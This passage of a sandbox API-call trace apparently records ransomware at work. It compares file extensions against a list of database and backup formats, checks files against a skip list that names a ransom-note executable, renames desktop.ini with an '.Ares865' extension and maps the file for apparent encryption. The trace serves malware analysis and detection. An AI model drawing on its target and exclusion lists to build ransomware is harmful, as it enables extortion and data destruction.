(lpString="dcb") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.785] lstrlenW (lpString="dct") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0092.785] lstrlenW (lpString="dcx") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0092.785] lstrlenW (lpString="ddl") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0092.785] lstrlenW (lpString="dlis") returned 4 [0092.785] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0092.785] lstrlenW (lpString="dp1") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0092.785] lstrlenW (lpString="dqy") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0092.785] lstrlenW (lpString="dsk") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0092.785] lstrlenW (lpString="dsn") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0092.785] lstrlenW (lpString="dtsx") returned 4 [0092.785] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0092.785] lstrlenW (lpString="dxl") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0092.786] lstrlenW (lpString="eco") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0092.786] lstrlenW (lpString="ecx") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0092.786] lstrlenW (lpString="edb") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0092.786] lstrlenW (lpString="epim") returned 4 [0092.786] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0092.786] lstrlenW (lpString="fcd") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0092.786] lstrlenW (lpString="fdb") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0092.786] lstrlenW (lpString="fic") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0092.786] lstrlenW (lpString="flexolibrary") returned 12 [0092.786] lstrlenW (lpString="fm5") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0092.786] lstrlenW (lpString="fmp") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0092.786] lstrlenW (lpString="fmp12") returned 5 [0092.786] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0092.786] lstrlenW (lpString="fmpsl") returned 5 [0092.786] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0092.786] lstrlenW (lpString="fol") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0092.786] lstrlenW (lpString="fp3") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0092.786] lstrlenW (lpString="fp4") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0092.786] lstrlenW (lpString="fp5") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0092.786] lstrlenW (lpString="fp7") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0092.786] lstrlenW (lpString="fpt") returned 3 [0092.786] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0092.786] lstrlenW (lpString="frm") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0092.787] lstrlenW (lpString="gdb") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.787] lstrlenW (lpString="gdb") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.787] lstrlenW (lpString="grdb") returned 4 [0092.787] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0092.787] lstrlenW (lpString="gwi") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0092.787] lstrlenW (lpString="hdb") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0092.787] lstrlenW (lpString="his") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0092.787] lstrlenW (lpString="ib") returned 2 [0092.787] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0092.787] lstrlenW (lpString="idb") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0092.787] lstrlenW (lpString="ihx") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0092.787] lstrlenW (lpString="itdb") returned 4 [0092.787] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0092.787] lstrlenW (lpString="itw") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0092.787] lstrlenW (lpString="jet") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0092.787] lstrlenW (lpString="jtx") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0092.787] lstrlenW (lpString="kdb") returned 3 [0092.787] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0092.787] lstrlenW (lpString="kexi") returned 4 [0092.787] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0092.787] lstrlenW (lpString="kexic") returned 5 [0092.787] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0092.787] lstrlenW (lpString="kexis") returned 5 [0092.787] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0092.787] lstrlenW (lpString="lgc") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0092.788] lstrlenW (lpString="lwx") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0092.788] lstrlenW (lpString="maf") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0092.788] lstrlenW (lpString="maq") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0092.788] lstrlenW (lpString="mar") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0092.788] lstrlenW (lpString="marshal") returned 7 [0092.788] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0092.788] lstrlenW (lpString="mas") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0092.788] lstrlenW (lpString="mav") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0092.788] lstrlenW (lpString="maw") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0092.788] lstrlenW (lpString="mdbhtml") returned 7 [0092.788] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0092.788] lstrlenW (lpString="mdn") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0092.788] lstrlenW (lpString="mdt") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0092.788] lstrlenW (lpString="mfd") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0092.788] lstrlenW (lpString="mpd") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0092.788] lstrlenW (lpString="mrg") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0092.788] lstrlenW (lpString="mud") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0092.788] lstrlenW (lpString="mwb") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0092.788] lstrlenW (lpString="myd") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0092.788] lstrlenW (lpString="ndf") returned 3 [0092.788] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0092.788] lstrlenW (lpString="nnt") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0092.789] lstrlenW (lpString="nrmlib") returned 6 [0092.789] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0092.789] lstrlenW (lpString="ns2") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0092.789] lstrlenW (lpString="ns3") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0092.789] lstrlenW (lpString="ns4") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0092.789] lstrlenW (lpString="nsf") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0092.789] lstrlenW (lpString="nv") returned 2 [0092.789] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0092.789] lstrlenW (lpString="nv2") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0092.789] lstrlenW (lpString="nwdb") returned 4 [0092.789] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0092.789] lstrlenW (lpString="nyf") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0092.789] lstrlenW (lpString="odb") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.789] lstrlenW (lpString="odb") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.789] lstrlenW (lpString="oqy") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0092.789] lstrlenW (lpString="ora") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0092.789] lstrlenW (lpString="orx") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0092.789] lstrlenW (lpString="owc") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0092.789] lstrlenW (lpString="p96") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0092.789] lstrlenW (lpString="p97") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0092.789] lstrlenW (lpString="pan") returned 3 [0092.789] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0092.789] lstrlenW (lpString="pdb") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0092.790] lstrlenW (lpString="pdm") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0092.790] lstrlenW (lpString="pnz") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0092.790] lstrlenW (lpString="qry") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0092.790] lstrlenW (lpString="qvd") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0092.790] lstrlenW (lpString="rbf") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0092.790] lstrlenW (lpString="rctd") returned 4 [0092.790] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0092.790] lstrlenW (lpString="rod") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0092.790] lstrlenW (lpString="rodx") returned 4 [0092.790] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0092.790] lstrlenW (lpString="rpd") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0092.790] lstrlenW (lpString="rsd") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0092.790] lstrlenW (lpString="sas7bdat") returned 8 [0092.790] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0092.790] lstrlenW (lpString="sbf") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0092.790] lstrlenW (lpString="scx") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0092.790] lstrlenW (lpString="sdb") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0092.790] lstrlenW (lpString="sdc") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0092.790] lstrlenW (lpString="sdf") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0092.790] lstrlenW (lpString="sis") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0092.790] lstrlenW (lpString="spq") returned 3 [0092.790] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0092.791] lstrlenW (lpString="te") returned 2 [0092.791] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0092.791] lstrlenW (lpString="teacher") returned 7 [0092.791] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0092.791] lstrlenW (lpString="tmd") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0092.791] lstrlenW (lpString="tps") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0092.791] lstrlenW (lpString="trc") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.791] lstrlenW (lpString="trc") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.791] lstrlenW (lpString="trm") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0092.791] lstrlenW (lpString="udb") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0092.791] lstrlenW (lpString="udl") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0092.791] lstrlenW (lpString="usr") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0092.791] lstrlenW (lpString="v12") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0092.791] lstrlenW (lpString="vis") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0092.791] lstrlenW (lpString="vpd") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0092.791] lstrlenW (lpString="vvv") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0092.791] lstrlenW (lpString="wdb") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0092.791] lstrlenW (lpString="wmdb") returned 4 [0092.791] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0092.791] lstrlenW (lpString="wrk") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0092.791] lstrlenW (lpString="xdb") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0092.791] lstrlenW (lpString="xld") returned 3 [0092.791] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0092.792] lstrlenW (lpString="xmlff") returned 5 [0092.792] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0092.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.Ares865") returned 58 [0092.792] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.792] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=524) returned 1 [0092.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.793] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.793] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.793] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.794] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x510, lpName=0x0) returned 0x15c [0092.794] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x510) returned 0x190000 [0092.794] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.795] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.795] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.796] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.796] CloseHandle (hObject=0x15c) returned 1 [0092.796] CloseHandle (hObject=0x118) returned 1 [0092.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.797] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="aoldtz.exe") returned 1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="windows") returned -1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootmgr") returned 1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="temp") returned -1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="pagefile.sys") returned -1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot") returned 1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ids.txt") returned -1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="perflogs") returned -1 [0092.797] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="MSBuild") returned -1 [0092.798] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0092.798] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 50 [0092.798] lstrcpyW (in: lpString1=0x2cce44e, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0092.798] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0092.798] lstrlenW (lpString="Ares865") returned 7 [0092.798] lstrcmpiW (lpString1="arch-ms", lpString2="Ares865") returned -1 [0092.798] lstrlenW (lpString=".dll") returned 4 [0092.798] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".dll") returned 1 [0092.798] lstrlenW (lpString=".lnk") returned 4 [0092.798] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".lnk") returned 1 [0092.798] lstrlenW (lpString=".ini") returned 4 [0092.798] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".ini") returned 1 [0092.798] lstrlenW (lpString=".sys") returned 4 [0092.798] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".sys") returned 1 [0092.798] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0092.798] lstrlenW (lpString="bak") returned 3 [0092.798] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0092.798] lstrlenW (lpString="ba_") returned 3 [0092.798] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0092.798] lstrlenW (lpString="dbb") returned 3 [0092.798] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0092.798] lstrlenW (lpString="vmdk") returned 4 [0092.798] lstrcmpiW (lpString1="h-ms", lpString2="vmdk") returned -1 [0092.798] lstrlenW (lpString="rar") returned 3 [0092.798] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0092.798] lstrlenW (lpString="zip") returned 3 [0092.799] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0092.799] lstrlenW (lpString="tgz") returned 3 [0092.799] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0092.799] lstrlenW (lpString="vbox") returned 4 [0092.799] lstrcmpiW (lpString1="h-ms", lpString2="vbox") returned -1 [0092.799] lstrlenW (lpString="vdi") returned 3 [0092.799] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0092.799] lstrlenW (lpString="vhd") returned 3 [0092.799] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0092.799] lstrlenW (lpString="vhdx") returned 4 [0092.799] lstrcmpiW (lpString1="h-ms", lpString2="vhdx") returned -1 [0092.799] lstrlenW (lpString="avhd") returned 4 [0092.799] lstrcmpiW (lpString1="h-ms", lpString2="avhd") returned 1 [0092.799] lstrlenW (lpString="db") returned 2 [0092.799] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0092.799] lstrlenW (lpString="db2") returned 3 [0092.799] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0092.799] lstrlenW (lpString="db3") returned 3 [0092.799] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0092.800] lstrlenW (lpString="dbf") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0092.800] lstrlenW (lpString="mdf") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0092.800] lstrlenW (lpString="mdb") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0092.800] lstrlenW (lpString="sql") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0092.800] lstrlenW (lpString="sqlite") returned 6 [0092.800] lstrcmpiW (lpString1="rch-ms", lpString2="sqlite") returned -1 [0092.800] lstrlenW (lpString="sqlite3") returned 7 [0092.800] lstrcmpiW (lpString1="arch-ms", lpString2="sqlite3") returned -1 [0092.800] lstrlenW (lpString="sqlitedb") returned 8 [0092.800] lstrcmpiW (lpString1="earch-ms", lpString2="sqlitedb") returned -1 [0092.800] lstrlenW (lpString="xml") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0092.800] lstrlenW (lpString="$er") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0092.800] lstrlenW (lpString="4dd") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0092.800] lstrlenW (lpString="4dl") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0092.800] lstrlenW (lpString="^^^") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0092.800] lstrlenW (lpString="abs") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0092.800] lstrlenW (lpString="abx") returned 3 [0092.800] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0092.800] lstrlenW (lpString="accdb") returned 5 [0092.800] lstrcmpiW (lpString1="ch-ms", lpString2="accdb") returned 1 [0092.800] lstrlenW (lpString="accdc") returned 5 [0092.800] lstrcmpiW (lpString1="ch-ms", lpString2="accdc") returned 1 [0092.800] lstrlenW (lpString="accde") returned 5 [0092.800] lstrcmpiW (lpString1="ch-ms", lpString2="accde") returned 1 [0092.800] lstrlenW (lpString="accdr") returned 5 [0092.800] lstrcmpiW (lpString1="ch-ms", lpString2="accdr") returned 1 [0092.800] lstrlenW (lpString="accdt") returned 5 [0092.801] lstrcmpiW (lpString1="ch-ms", lpString2="accdt") returned 1 [0092.801] lstrlenW (lpString="accdw") returned 5 [0092.801] lstrcmpiW (lpString1="ch-ms", lpString2="accdw") returned 1 [0092.801] lstrlenW (lpString="accft") returned 5 [0092.801] lstrcmpiW (lpString1="ch-ms", lpString2="accft") returned 1 [0092.801] lstrlenW (lpString="adb") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0092.801] lstrlenW (lpString="adb") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0092.801] lstrlenW (lpString="ade") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0092.801] lstrlenW (lpString="adf") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0092.801] lstrlenW (lpString="adn") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0092.801] lstrlenW (lpString="adp") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0092.801] lstrlenW (lpString="alf") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0092.801] lstrlenW (lpString="ask") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0092.801] lstrlenW (lpString="btr") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0092.801] lstrlenW (lpString="cat") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0092.801] lstrlenW (lpString="cdb") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0092.801] lstrlenW (lpString="ckp") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0092.801] lstrlenW (lpString="cma") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0092.801] lstrlenW (lpString="cpd") returned 3 [0092.801] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0092.801] lstrlenW (lpString="dacpac") returned 6 [0092.801] lstrcmpiW (lpString1="rch-ms", lpString2="dacpac") returned 1 [0092.801] lstrlenW (lpString="dad") returned 3 [0092.802] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0092.802] lstrlenW (lpString="dadiagrams") returned 10 [0092.802] lstrcmpiW (lpString1=".search-ms", lpString2="dadiagrams") returned -1 [0092.802] lstrlenW 